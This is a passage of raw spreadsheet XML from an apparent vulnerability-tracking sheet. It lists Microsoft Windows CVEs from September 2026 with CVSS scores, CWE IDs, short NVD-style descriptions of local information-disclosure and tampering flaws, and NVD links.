t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1264" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1264" s="5" t="inlineStr" /><c r="H1264" s="5" t="n"><v>0.004</v></c><c r="I1264" s="5" t="inlineStr" /><c r="J1264" s="5" t="inlineStr" /><c r="K1264" s="5" t="inlineStr" /><c r="L1264" s="5" t="inlineStr" /><c r="M1264" s="5" t="inlineStr" /><c r="N1264" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1264" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1264" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1264" s="5" t="inlineStr" /><c r="R1264" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1264" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1264" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69367</t></is></c></row><row r="1265"><c r="A1265" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1265" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1265" s="5" t="inlineStr"><is><t>CVE-2026-69369</t></is></c><c r="D1265" s="5" t="n"><v>5.5</v></c><c r="E1265" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1265" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1265" s="5" t="inlineStr" /><c r="H1265" s="5" t="n"><v>0.003</v></c><c r="I1265" s="5" t="inlineStr" /><c r="J1265" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1265" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1265" s="5" t="inlineStr" /><c r="M1265" s="5" t="inlineStr" /><c r="N1265" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1265" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1265" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1265" s="5" t="inlineStr" /><c r="R1265" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1265" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DNS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1265" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69369</t></is></c></row><row r="1266"><c r="A1266" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1266" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1266" s="5" t="inlineStr"><is><t>CVE-2026-69376</t></is></c><c r="D1266" s="5" t="n"><v>5.5</v></c><c r="E1266" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1266" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1266" s="5" t="inlineStr" /><c r="H1266" s="5" t="n"><v>0.004</v></c><c r="I1266" s="5" t="inlineStr" /><c r="J1266" s="5" t="inlineStr" /><c r="K1266" s="5" t="inlineStr" /><c r="L1266" s="5" t="inlineStr" /><c r="M1266" s="5" t="inlineStr" /><c r="N1266" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1266" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1266" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1266" s="5" t="inlineStr" /><c r="R1266" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1266" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1266" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69376</t></is></c></row><row r="1267"><c r="A1267" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1267" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1267" s="5" t="inlineStr"><is><t>CVE-2026-69390</t></is></c><c r="D1267" s="5" t="n"><v>5.5</v></c><c r="E1267" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1267" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1267" s="5" t="inlineStr" /><c r="H1267" s="5" t="n"><v>0.004</v></c><c r="I1267" s="5" t="inlineStr" /><c r="J1267" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K126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67" s="5" t="inlineStr" /><c r="M1267" s="5" t="inlineStr" /><c r="N1267" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1267" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1267" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1267" s="5" t="inlineStr" /><c r="R1267" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1267" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t></is></c><c r="T1267" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69390</t></is></c></row><row r="1268"><c r="A1268" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1268" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1268" s="5" t="inlineStr"><is><t>CVE-2026-69403</t></is></c><c r="D1268" s="5" t="n"><v>5.5</v></c><c r="E1268" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1268" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1268" s="5" t="inlineStr" /><c r="H1268" s="5" t="n"><v>0.003</v></c><c r="I1268" s="5" t="inlineStr" /><c r="J1268" s="5" t="inlineStr" /><c r="K1268" s="5" t="inlineStr" /><c r="L1268" s="5" t="inlineStr" /><c r="M1268" s="5" t="inlineStr" /><c r="N1268" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1268" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1268" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1268" s="5" t="inlineStr" /><c r="R1268" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1268" s="5" t="inlineStr"><is><t>Missing authorization in Windows SMB Server allows an authorized attacker to disclose information locally.</t></is></c><c r="T1268" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69403</t></is></c></row><row r="1269"><c r="A1269" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1269" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1269" s="5" t="inlineStr"><is><t>CVE-2026-69406</t></is></c><c r="D1269" s="5" t="n"><v>5.5</v></c><c r="E1269" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1269" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1269" s="5" t="inlineStr" /><c r="H1269" s="5" t="n"><v>0.005</v></c><c r="I1269" s="5" t="inlineStr" /><c r="J1269" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K126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69" s="5" t="inlineStr" /><c r="M1269" s="5" t="inlineStr" /><c r="N1269" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1269" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1269" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1269" s="5" t="inlineStr" /><c r="R1269" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1269" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows Kernel allows an authorized attacker to disclose information locally.</t></is></c><c r="T1269" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69406</t></is></c></row><row r="1270"><c r="A1270" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1270" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1270" s="5" t="inlineStr"><is><t>CVE-2026-69453</t></is></c><c r="D1270" s="5" t="n"><v>5.5</v></c><c r="E1270" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1270" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1270" s="5" t="inlineStr" /><c r="H1270" s="5" t="n"><v>0.003</v></c><c r="I1270" s="5" t="inlineStr" /><c r="J1270" s="5" t="inlineStr" /><c r="K1270" s="5" t="inlineStr" /><c r="L1270" s="5" t="inlineStr" /><c r="M1270" s="5" t="inlineStr" /><c r="N1270" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1270" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1270" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1270" s="5" t="inlineStr" /><c r="R1270" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1270" s="5" t="inlineStr"><is><t>Missing authorization in Microsoft Windows Search Component allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1270" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69453</t></is></c></row><row r="1271"><c r="A1271" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1271" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1271" s="5" t="inlineStr"><is><t>CVE-2026-69457</t></is></c><c r="D1271" s="5" t="n"><v>5.5</v></c><c r="E1271" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1271" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1271" s="5" t="inlineStr" /><c r="H1271" s="5" t="n"><v>0.004</v></c><c r="I1271" s="5" t="inlineStr" /><c r="J1271" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K127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1" s="5" t="inlineStr" /><c r="M1271" s="5" t="inlineStr" /><c r="N1271" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1271" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1271" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1271" s="5" t="inlineStr" /><c r="R1271" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1271" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows USB Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="T1271" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69457</t></is></c></row><row r="1272"><c r="A1272" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1272" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1272" s="5" t="inlineStr"><is><t>CVE-2026-69504</t></is></c><c r="D1272" s="5" t="n"><v>5.5</v></c><c r="E1272" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1272" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1272" s="5" t="inlineStr" /><c r="H1272" s="5" t="n"><v>0.004</v></c><c r="I1272" s="5" t="inlineStr" /><c r="J1272" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K127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2" s="5" t="inlineStr" /><c r="M1272" s="5" t="inlineStr" /><c r="N1272" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1272" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1272" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1272" s="5" t="inlineStr" /><c r="R1272" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1272" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1272" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69504</t></is></c></row><row r="1273"><c r="A1273" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1273" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1273" s="5" t="inlineStr"><is><t>CVE-2026-69527</t></is></c><c r="D1273" s="5" t="n"><v>5.5</v></c><c r="E1273" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1273" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1273" s="5" t="inlineStr" /><c r="H1273" s="5" t="n"><v>0.004</v></c><c r="I1273" s="5" t="inlineStr" /><c r="J1273" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K127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3" s="5" t="inlineStr" /><c r="M1273" s="5" t="inlineStr" /><c r="N1273" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1273" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1273" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1273" s="5" t="inlineStr" /><c r="R1273" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1273" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows USB Mass Storage Class Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="T1273" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69527</t></is></c></row><row r="1274"><c r="A1274" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1274" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1274" s="5" t="inlineStr"><is><t>CVE-2026-69531</t></is></c><c r="D1274" s="5" t="n"><v>5.5</v></c><c r="E1274" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1274" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1274" s="5" t="inlineStr" /><c r="H1274" s="5" t="n"><v>0.003</v></c><c r="I1274" s="5" t="inlineStr" /><c r="J1274" s="5" t="inlineStr" /><c r="K1274" s="5" t="inlineStr" /><c r="L1274" s="5" t="inlineStr" /><c r="M1274" s="5" t="inlineStr" /><c r="N1274" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1274" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1274" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1274" s="5" t="inlineStr" /><c r="R1274" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S1274" s="5" t="inlineStr"><is><t>Unintended proxy or intermediary ('confused deputy') in Microsoft Windows Speech allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1274" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69531</t></is></c></row><row r="1275"><c r="A1275" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1275" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1275" s="5" t="inlineStr"><is><t>CVE-2026-69554</t></is></c><c r="D1275" s="5" t="n"><v>5.5</v></c><c r="E1275" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1275" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1275" s="5" t="inlineStr" /><c r="H1275" s="5" t="n"><v>0.003</v></c><c r="I1275" s="5" t="inlineStr" /><c r="J1275" s="5" t="inlineStr" /><c r="K1275" s="5" t="inlineStr" /><c r="L1275" s="5" t="inlineStr" /><c r="M1275" s="5" t="inlineStr" /><c r="N1275" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1275" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1275" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1275" s="5" t="inlineStr" /><c r="R1275" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S1275" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Microsoft Windows Search Component allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1275" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69554</t></is></c></row><row r="1276"><c r="A1276" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1276" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1276" s="5" t="inlineStr"><is><t>CVE-2026-69568</t></is></c><c r="D1276" s="5" t="n"><v>5.5</v></c><c r="E1276" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1276" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1276" s="5" t="inlineStr" /><c r="H1276" s="5" t="n"><v>0.004</v></c><c r="I1276" s="5" t="inlineStr" /><c r="J1276" s="5" t="inlineStr" /><c r="K1276" s="5" t="inlineStr" /><c r="L1276" s="5" t="inlineStr" /><c r="M1276" s="5" t="inlineStr" /><c r="N1276" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1276" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1276" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1276" s="5" t="inlineStr" /><c r="R1276" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1276" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Storage Spaces Controller allows an authorized attacker to disclose information locally.</t></is></c><c r="T1276" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69568</t></is></c></row><row r="1277"><c r="A1277" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1277" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1277" s="5" t="inlineStr"><is><t>CVE-2026-69609</t></is></c><c r="D1277" s="5" t="n"><v>5.5</v></c><c r="E1277" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1277" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1277" s="5" t="inlineStr" /><c r="H1277" s="5" t="n"><v>0.004</v></c><c r="I1277" s="5" t="inlineStr" /><c r="J1277" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K127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7" s="5" t="inlineStr" /><c r="M1277" s="5" t="inlineStr" /><c r="N1277" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1277" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1277" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1277" s="5" t="inlineStr" /><c r="R1277" s="5" t="inlineStr"><is><t>CWE-125, CWE-193</t></is></c><c r="S1277" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Win32K allows an authorized attacker to disclose information locally.</t></is></c><c r="T1277" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69609</t></is></c></row><row r="1278"><c r="A1278" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1278" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1278" s="5" t="inlineStr"><is><t>CVE-2026-69616</t></is></c><c r="D1278" s="5" t="n"><v>5.5</v></c><c r="E1278" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1278" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1278" s="5" t="inlineStr" /><c r="H1278" s="5" t="n"><v>0.004</v></c><c r="I1278" s="5" t="inlineStr" /><c r="J1278" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K127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8" s="5" t="inlineStr" /><c r="M1278" s="5" t="inlineStr" /><c r="N1278" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1278" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1278" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1278" s="5" t="inlineStr" /><c r="R1278" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1278" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Remote Desktop Services allows an authorized attacker to disclose information locally.</t></is></c><c r="T1278" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69616</t></is></c></row><row r="1279"><c r="A1279" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1279" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1279" s="5" t="inlineStr"><is><t>CVE-2026-69618</t></is></c><c r="D1279" s="5" t="n"><v>5.5</v></c><c r="E1279" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1279" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1279" s="5" t="inlineStr" /><c r="H1279" s="5" t="n"><v>0.004</v></c><c r="I1279" s="5" t="inlineStr" /><c r="J1279" s="5" t="inlineStr" /><c r="K1279" s="5" t="inlineStr" /><c r="L1279" s="5" t="inlineStr" /><c r="M1279" s="5" t="inlineStr" /><c r="N1279" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1279" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1279" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1279" s="5" t="inlineStr" /><c r="R1279" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1279" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows SMB Client allows an authorized attacker to disclose information locally.</t></is></c><c r="T1279" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69618</t></is></c></row><row r="1280"><c r="A1280" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1280" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1280" s="5" t="inlineStr"><is><t>CVE-2026-69627</t></is></c><c r="D1280" s="5" t="n"><v>5.5</v></c><c r="E1280" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1280" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1280" s="5" t="inlineStr" /><c r="H1280" s="5" t="n"><v>0.004</v></c><c r="I1280" s="5" t="inlineStr" /><c r="J1280" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K128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80" s="5" t="inlineStr" /><c r="M1280" s="5" t="inlineStr" /><c r="N1280" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1280" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1280" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1280" s="5" t="inlineStr" /><c r="R1280" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1280" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Remote Desktop Licensing Service allows an authorized attacker to disclose information locally.</t></is></c><c r="T1280" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69627</t></is></c></row><row r="1281"><c r="A1281" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1281" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1281" s="5" t="inlineStr"><is><t>CVE-2026-69672</t></is></c><c r="D1281" s="5" t="n"><v>5.5</v></c><c r="E1281" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1281" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1281" s="5" t="inlineStr" /><c r="H1281" s="5" t="n"><v>0.004</v></c><c r="I1281" s="5" t="inlineStr" /><c r="J1281" s="5" t="inlineStr" /><c r="K1281" s="5" t="inlineStr" /><c r="L1281" s="5" t="inlineStr" /><c r="M1281" s="5" t="inlineStr" /><c r="N1281" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1281" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1281" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1281" s="5" t="inlineStr" /><c r="R1281" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1281" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows DNS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1281" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69672</t></is></c></row><row r="1282"><c r="A1282" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1282" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1282" s="5" t="inlineStr"><is><t>CVE-2026-69674</t></is></c><c r="D1282" s="5" t="n"><v>5.5</v></c><c r="E1282" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1282" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1282" s="5" t="inlineStr" /><c r="H1282" s="5" t="n"><v>0.003</v></c><c r="I1282" s="5" t="inlineStr" /><c r="J1282" s="5" t="inlineStr" /><c r="K1282" s="5" t="inlineStr" /><c r="L1282" s="5" t="inlineStr" /><c r="M1282" s="5" t="inlineStr" /><c r="N1282" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1282" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1282" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1282" s="5" t="inlineStr" /><c r="R1282" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S1282" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows Modern Device Management (MDM) allows an authorized attacker to bypass a security feature locally.</t></is></c><c r="T1282" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69674</t></is></c></row><row r="1283"><c r="A1283" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1283" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1283" s="5" t="inlineStr"><is><t>CVE-2026-69684</t></is></c><c r="D1283" s="5" t="n"><v>5.5</v></c><c r="E1283" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1283" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1283" s="5" t="inlineStr" /><c r="H1283" s="5" t="n"><v>0.005</v></c><c r="I1283" s="5" t="inlineStr" /><c r="J1283" s="5" t="inlineStr" /><c r="K1283" s="5" t="inlineStr" /><c r="L1283" s="5" t="inlineStr" /><c r="M1283" s="5" t="inlineStr" /><c r="N1283" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1283" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1283" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1283" s="5" t="inlineStr" /><c r="R1283" s="5" t="inlineStr"><is><t>CWE-209</t></is></c><c r="S1283" s="5" t="inlineStr"><is><t>Generation of error message containing sensitive information in Windows Error Reporting allows an authorized attacker to disclose information locally.</t></is></c><c r="T1283" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69684</t></is></c></row><row r="1284"><c r="A1284" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1284" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1284" s="5" t="inlineStr"><is><t>CVE-2026-69741</t></is></c><c r="D1284" s="5" t="n"><v>5.5</v></c><c r="E1284" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1284" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1284" s="5" t="inlineStr" /><c r="H1284" s="5" t="n"><v>0.004</v></c><c r="I1284" s="5" t="inlineStr" /><c r="J1284" s="5" t="inlineStr" /><c r="K1284" s="5" t="inlineStr" /><c r="L1284" s="5" t="inlineStr" /><c r="M1284" s="5" t="inlineStr" /><c r="N1284" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1284" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1284" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1284" s="5" t="inlineStr" /><c r="R1284" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1284" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t></is></c><c r="T1284" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69741</t></is></c></row><row r="1285"><c r="A1285" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1285" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1285" s="5" t="inlineStr"><is><t>CVE-2026-69770</t></is></c><c r="D1285" s="5" t="n"><v>5.5</v></c><c r="E1285" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1285" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1285" s="5" t="inlineStr" /><c r="H1285" s="5" t="n"><v>0.004</v></c><c r="I1285" s="5" t="inlineStr" /><c r="J1285" s="5" t="inlineStr" /><c r="K1285" s="5" t="inlineStr" /><c r="L1285" s="5" t="inlineStr" /><c r="M1285" s="5" t="inlineStr" /><c r="N1285" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1285" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1285" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1285" s="5" t="inlineStr" /><c r="R1285" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1285" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t></is></c><c r="T1285" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69770</t></is></c></row><row r="1286"><c r="A1286" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1286" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1286" s="5" t="inlineStr"><is><t>CVE-2026-69794</t></is></c><c r="D1286" s="5" t="n"><v>5.5</v></c><c r="E1286" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1286" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1286" s="5" 